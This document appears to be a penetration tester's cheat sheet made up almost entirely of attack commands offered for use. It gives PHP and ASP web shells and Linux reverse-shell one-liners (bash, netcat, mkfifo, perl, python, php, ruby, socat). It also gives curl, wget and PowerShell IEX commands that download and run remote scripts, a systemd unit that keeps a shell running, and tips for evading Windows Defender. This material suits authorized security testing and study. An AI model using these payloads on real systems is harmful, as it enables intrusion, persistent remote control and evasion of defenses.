Reverse Shells

Web Shells

POST vs GET request shells

$_REQUEST = POST request shell
Benefits of using a POST request shell

Less likely to show up in logs
Less bad characters

PHP

<?php system($_REQUEST["cmd"]); ?>
<?php system($_REQUEST['cmd']); ?>
<?php system($_GET["cmd"]); ?>
<?php system("<bash command>"); ?>
<?php echo "START<br/><br/>\n\n\n"; system($_GET["cmd"]); echo "\n\n\n<br/><br/>END"; ?>

asp and aspx

asp	vbscript based Older (around 2003)
aspx	.net based Newer

msfvenom

msfvenom -f asp
msfvenom -f aspx

asp shells

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

<%
Dim oS
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell4444.exe",0,True)
%>

Linux Reverse Shells

netcat reverse shell

Download netcat to victim machine if it does not already exist
nc <ip address> <port> -e /bin/bash

Commands for reverse shells

bash -c 'bash -i >& /dev/tcp/<ip address>/<port> 0>&1'

curl http://<ip address>/shell.sh | bash

bash /tmp/shell.sh

wget http://<ip address>/shell.sh -O /tmp/shell.sh

bash /tmp/shell.sh

nc -e /bin/sh <ip address> <port>

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip address> <port> >/tmp/f

perl -e 'use Socket;$i="<ip address>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<ip address>\",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"

php -r "\$sock=fsockopen(\"<ip address>\",<port>);exec(\"/bin/sh -i <&3 >&3 2>&3\");"

ruby -r socket -e "f=TCPSocket.open(\"<ip address>\",<port>).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)"

socat reverse shell

Set up listener	socat file:`tty`,raw,echo=0 tcp-listen:80
Execute reverse shell	socat tcp-connect:<ip address>:<port> exec:/bin/sh,pty,stderr,setsid,sigint,sane

Reverse shell using linux service


[Service]
Type=notify
ExecStart=/bin/bash -c 'nc -e /bin/bash <ip address> <port>'
KillMode=process
Restart=on-failure
RestartSec=40s
[Install]
WantedBy=multi-user.target


systemctl link <.service file>
systemctl start <service>

Windows

Enumerating command execution

<command>
cmd <command>
cmd.exe <command>
cmd /c <command>
cmd.exe /c <command>
C:\Windows\System32\cmd.exe <command>

Fully interactive w/ autocomplete shell

https://github.com/antonioCoco/ConPtyShell

Locations to write shell to:

C:\Windows\System32\spool\drivers\color\
C:\Windows\Temp

netcat reverse shell

Download netcat to Windows machine if it does not already exist
Try both nc.exe and nc64.exe
nc <ip address> <port> -e cmd
nc <ip address> <port> -e powershell

Powershell reverse shell

Run with Nishang powershell reverse shell script

Windows Defender evasion

If Windows is blocking the script from running

Remove all usage comments from the reverse shell script
Rename the shell file to something not suspicious
Change the "Invoke" method name

Download and run powershell script	powershell -c "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')" powershell "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')" IEX(IWR http://<ip address>/shell.ps1 -UseBasicParsing)
Base64 Encoded powershell	echo "IEX(IWR http://<ip address>/shell.ps1 -UseBasicParsing)" \| iconv -t utf-16le \| base64 -w 0 powershell -e <Base64 Encoded Shell> powershell -EncodedCommand <Base64 Encoded Shell>

socat reverse shell

Set up listener	socat file:`tty`,raw,echo=0 tcp-listen:80
Execute reverse shell	socat tcp-connect:<ip address>:<port> exec:/bin/sh,pty,stderr,setsid,sigint,sane